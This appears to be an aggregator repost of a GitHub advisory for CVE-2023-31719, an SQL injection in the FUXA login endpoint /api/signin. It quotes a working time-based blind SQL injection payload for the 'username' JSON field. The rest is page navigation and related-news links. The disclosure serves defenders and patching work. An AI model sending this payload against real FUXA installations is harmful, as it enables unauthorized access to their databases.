Headline

CVE-2023-31719: GitHub - MateusTesser/CVE-2023-31719

FUXA <= 1.1.12 is vulnerable to SQL Injection via /api/signin.

1 year ago

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

1 branch 0 tags

Code

Use Git or checkout with SVN using the web URL.
Open with GitHub Desktop
Download ZIP

Latest commit

Files

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

CVE-2023-31719

Its possible do inject SQL code into the JSON parameter “username” from the endpoint /api/signin via HTTP POST request

{"username":"test’ OR 2891=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- ZJMj","password":"test"}

Name Affected product: FUXA

Version affected: <= 1.1.12

Problem: SQL Injection

Description: Its possible do inject SQL code into the JSON parameter “username” from the endpoint /api/signin via HTTP POST request

FUXA <= 1.1.12 is vulnerable to SQL Injection via `/api/signin`.

1 year ago

ghsa

Open in Source

#sql #vulnerability #git

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

1 year ago

1 year ago

1 year ago

1 year ago

1 year ago

Headline

CVE-2023-31719: GitHub - MateusTesser/CVE-2023-31719

Related news

CVE: Latest News